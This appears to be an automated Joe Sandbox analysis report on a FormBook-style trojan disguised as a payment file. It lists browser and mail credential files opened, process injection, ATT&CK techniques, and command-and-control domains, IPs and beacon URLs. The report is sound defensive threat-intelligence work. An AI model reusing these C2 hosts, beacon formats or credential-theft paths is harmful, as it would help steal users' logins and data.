                Source: Yara match | File source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Latest advice payment.exe | Binary or memory string: WIN_81
                Source: Latest advice payment.exe | Binary or memory string: WIN_XP
                Source: Latest advice payment.exe | Binary or memory string: WIN_XPe
                Source: Latest advice payment.exe | Binary or memory string: WIN_VISTA
                Source: Latest advice payment.exe | Binary or memory string: WIN_7
                Source: Latest advice payment.exe | Binary or memory string: WIN_8
                Source: Latest advice payment.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_005D6283
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_005D6747
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 2 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior Graph] ID: 1567859, Sample: Latest advice payment.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100. Process chain: Latest advice payment.exe starts svchost.exe; svchost.exe injects into CWtKbasqHVKAO.exe; CWtKbasqHVKAO.exe starts bitsadmin.exe; bitsadmin.exe injects into CWtKbasqHVKAO.exe and starts firefox.exe. Network nodes: www.soainsaat.xyz, www.amayavp.xyz (185.27.134.144, ports 49965, 49970, 49977, WILDCARD-ASWildcardUKLimitedGB, United Kingdom), www.xcvbj.asia (149.88.81.190, ports 49889, 49895, 49900, SAIC-ASUS, United States) and other IPs or domains. Signatures attached to the graph nodes are those listed in the Signatures overview (Suricata IDS alerts, AV detections, AutoIt compiled script, sandbox detection, foreign memory writes, direct / indirect syscalls, mail and browser credential theft, thread injection).

                Source | Detection | Scanner | Label | Link
                Latest advice payment.exe | 47% | ReversingLabs | Win32.Trojan.AutoitInject |
                Latest advice payment.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P100%Avira URL Cloudmalware
                http://www.learnwithus.site0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/0%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/100%Avira URL Cloudmalware
                http://www.laohub10.net/sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2100%Avira URL Cloudmalware
                http://www.learnwithus.site/alu5/0%Avira URL Cloudsafe
                https://login.livnn0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.learnwithus.site
                209.74.77.107
                truefalse
                  high
                  www.vayui.top
                  172.67.145.234
                  truefalse
                    high
                    www.amayavp.xyz
                    185.27.134.144
                    truefalse
                      high
                      r0lqcud7.nbnnn.xyz
                      27.124.4.246
                      truefalse
                        high
                        www.xcvbj.asia
                        149.88.81.190
                        truefalse
                          high
                          www.rgenerousrs.store
                          172.67.167.146
                          truefalse
                            high
                            www.nb-shenshi.buzz
                            161.97.168.245
                            truefalse
                              high
                              natroredirect.natrocdn.com
                              85.159.66.93
                              truefalse
                                high
                                www.t91rl7.pro
                                154.88.22.101
                                truefalse
                                  high
                                  www.laohub10.net
                                  unknown
                                  unknownfalse
                                    high
                                    www.cuthethoi.online
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.soainsaat.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.soainsaat.xyz/rum2/true
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.rgenerousrs.store/o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.laohub10.net/sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.vayui.top/vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.nb-shenshi.buzz/xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.laohub10.net/sgdd/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.vayui.top/vg0z/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.t91rl7.pro/jhb8/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.rgenerousrs.store/o362/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.learnwithus.site/alu5/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.xcvbj.asia/rq1s/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.amayavp.xyz/d9ku/true
                                        • Avira URL Cloud: malware
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabbitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://server/get.aspsvchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.learnwithus.site | CWtKbasqHVKAO.exe, 0000000C.00000002.3993071436.00000000057B5000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2 | bitsadmin.exe, 00000008.00000002.3991882171.000000000411C000.00000004.10000000.00040000.00000000.sdmp; bitsadmin.exe, 00000008.00000002.3993392825.00000000060D0000.00000004.00000800.00020000.00000000.sdmp; CWtKbasqHVKAO.exe, 0000000C.00000002.3991649749.0000000003D5C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://login.livnn | bitsadmin.exe, 00000008.00000002.3990124569.00000000005C0000.00000004.00000020.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.live | bitsadmin.exe, 00000008.00000002.3990678417.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.88.81.190 | www.xcvbj.asia | United States | 188 | SAIC-ASUS | false
172.67.167.146 | www.rgenerousrs.store | United States | 13335 | CLOUDFLARENETUS | false
209.74.77.107 | www.learnwithus.site | United States | 31744 | MULTIBAND-NEWHOPEUS | false
185.27.134.144 | www.amayavp.xyz | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
27.124.4.246 | r0lqcud7.nbnnn.xyz | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false
172.67.145.234 | www.vayui.top | United States | 13335 | CLOUDFLARENETUS | false
154.88.22.101 | www.t91rl7.pro | Seychelles | 40065 | CNSERVERSUS | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
161.97.168.245 | www.nb-shenshi.buzz | United States | 51167 | CONTABODE | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567859
Start date and time: 2024-12-03 23:25:59 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Latest advice payment.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@12/9
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 49
• Number of non-executed functions: 280
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: Latest advice payment.exe
                                                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.88.81.190 | Document_084462.scr.exe | malicious | FormBook, GuLoader | www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs
149.88.81.190 | Proforma invoice - Arancia NZ.exe | malicious | FormBook | www.xcvbj.asia/hkgx/
149.88.81.190 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | PAYROLL LIST.exe | malicious | FormBook | www.xcvbj.asia/hkgx/
149.88.81.190 | purchase Order.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
172.67.167.146 | Proforma invoice - Arancia NZ.exe | malicious | FormBook | www.rgenerousrs.store/8gp4/
172.67.167.146 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.rgenerousrs.store/o362/
172.67.167.146 | purchase Order.exe | malicious | FormBook | www.rgenerousrs.store/o362/
172.67.167.146 | Mandatory Notice for all December Leave and Vacation application.exe | malicious | FormBook | www.rgenerousrs.store/zr8v/
209.74.77.107 | SW_5724.exe | malicious | FormBook | www.happyjam.life/4ii9/
209.74.77.107 | quotation.exe | malicious | FormBook | www.gadgetre.info/8q8w/
209.74.77.107 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.beyondfitness.live/fbpt/
209.74.77.107 | specifications.exe | malicious | FormBook, PureLog Stealer | www.gadgetre.info/8q8w/
209.74.77.107 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.learnwithus.site/alu5/
209.74.77.107 | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | www.gadgetre.info/8q8w/
209.74.77.107 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.learnwithus.site/alu5/
209.74.77.107 | Purchase Order PO.exe | malicious | FormBook | www.beyondfitness.live/fbpt/
209.74.77.107 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.learnwithus.site/alu5/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.learnwithus.site | Docs.exe | malicious | FormBook, PureLog Stealer | 209.74.77.107
www.learnwithus.site | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 209.74.77.107
www.learnwithus.site | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 209.74.77.107
www.learnwithus.site | RFQ 3100185 MAHAD.exe | malicious | FormBook | 209.74.77.107
r0lqcud7.nbnnn.xyz | Document_084462.scr.exe | malicious | FormBook, GuLoader | 23.225.159.42
r0lqcud7.nbnnn.xyz | quotation.exe | malicious | FormBook | 27.124.4.246
r0lqcud7.nbnnn.xyz | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 23.225.159.42
r0lqcud7.nbnnn.xyz | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 202.79.161.151
r0lqcud7.nbnnn.xyz | lKvXJ7VVCK.exe | malicious | FormBook | 23.225.159.42
r0lqcud7.nbnnn.xyz | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | 27.124.4.246
r0lqcud7.nbnnn.xyz | specifications.exe | malicious | FormBook, PureLog Stealer | 23.225.159.42
r0lqcud7.nbnnn.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 202.79.161.151
r0lqcud7.nbnnn.xyz | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 202.79.161.151
r0lqcud7.nbnnn.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 27.124.4.246
www.amayavp.xyz | Order MEI PO IM202411484.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | IETC-24017.exe | malicious | FormBook, PureLog Stealer | 185.27.134.144
www.amayavp.xyz | purchase Order.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | DOC_114542366.vbe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | RFQ 3100185 MAHAD.exe | malicious | FormBook | 185.27.134.144
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
www.vayui.top | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | 104.21.95.160
www.vayui.top | purchase Order.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | RFQ 3100185 MAHAD.exe | malicious | FormBook | 172.67.145.234
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MULTIBAND-NEWHOPEUS | Document_084462.scr.exe | malicious | FormBook, GuLoader | 209.74.77.109
MULTIBAND-NEWHOPEUS | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | SW_5724.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | 72STaC6BmljfbIQ.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | quotation.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | 209.74.77.107
MULTIBAND-NEWHOPEUS | specification and drawing.exe | malicious | FormBook, PureLog Stealer | 209.74.64.187
MULTIBAND-NEWHOPEUS | Order MEI PO IM202411484.exe | malicious | FormBook | 209.74.77.108
MULTIBAND-NEWHOPEUS | specifications.exe | malicious | FormBook, PureLog Stealer | 209.74.77.107
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, Vidar | 104.21.43.156
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.82.174
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.181.44
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.181.192
CLOUDFLARENETUS | http://flcu.ph | malicious | Unknown | 104.21.11.124
CLOUDFLARENETUS | http://divisioninfo.net/ | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://ublypwgeo.turismoalperu.com/ | malicious | Captcha Phish | 172.67.206.223
CLOUDFLARENETUS | xd.mpsl.elf | malicious | Mirai | 172.69.251.253
CLOUDFLARENETUS | https://google.com/amp/s/fundosofia.com%2Felincrms%2Fcdmhcms%2FG%2Fcm9oYXJhQGJhcnRvbmFzc29jaWF0ZXMuY29t | malicious | Captcha Phish | 104.21.27.105
WILDCARD-ASWildcardUKLimitedGB | quotation.exe | malicious | FormBook | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | YH-3-12-2024-GDL Units - Projects.exe | malicious | FormBook | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | Order MEI PO IM202411484.exe | malicious | FormBook | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | mips.elf | malicious | Mirai | 82.163.179.123
WILDCARD-ASWildcardUKLimitedGB | BASF Hung#U00e1ria Kft.exe | malicious | FormBook | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | specifications.exe | malicious | FormBook, PureLog Stealer | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 185.27.134.144
WILDCARD-ASWildcardUKLimitedGB | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 185.27.134.144
WILDCARD-ASWildcardUKLimitedGB | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | 185.27.134.206
SAIC-ASUS | Document_084462.scr.exe | malicious | FormBook, GuLoader | 149.88.81.190
SAIC-ASUS | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 149.88.81.190
SAIC-ASUS | sora.mips.elf | malicious | Mirai | 149.73.18.108
SAIC-ASUS | sora.mpsl.elf | malicious | Mirai | 149.88.21.86
SAIC-ASUS | botx.m68k.elf | malicious | Mirai | 149.88.69.19
SAIC-ASUS | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 149.88.81.190
SAIC-ASUS | xobftuootu.elf | malicious | Unknown | 149.115.34.148
SAIC-ASUS | mips.nn.elf | malicious | Mirai, Okiru | 149.112.190.216
SAIC-ASUS | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 149.88.81.190
SAIC-ASUS | la.bot.arm6.elf | malicious | Unknown | 149.65.107.71
                                                          No context
                                                          No context
Process: C:\Users\user\Desktop\Latest advice payment.exe
File Type: data
Category: dropped
Size (bytes): 289280
Entropy (8bit): 7.994715280767631
Encrypted: true
SSDEEP: 6144:h1iR0XA42MSqI3rBt7zjhK58tYyBBnk6ZxsryCLAj+VtkDtW+dxPK:h1iRQ/5e508tq6Zxsmpj+VtkDhPK
MD5: 9C448033DA5DD5ECF1A2FAA1ADBC1568
SHA1: D4B3823B9C4C93BF477CFB0DA2A01EE768E16B3D
SHA-256: 283A93AFB136D17562A4DCA5177BFD97AF2C14B455BFFD18C484FEC6529EFAB6
SHA-512: EC12DDFD3D2217097AE66493F204E14BFE63723D93F090D505FAA6BD73D87C4C3BC2C19EE9E55234295112E0FBD5D146F53036DD40A8CE89B7B2B0D57980B188
Malicious: false
Reputation: low
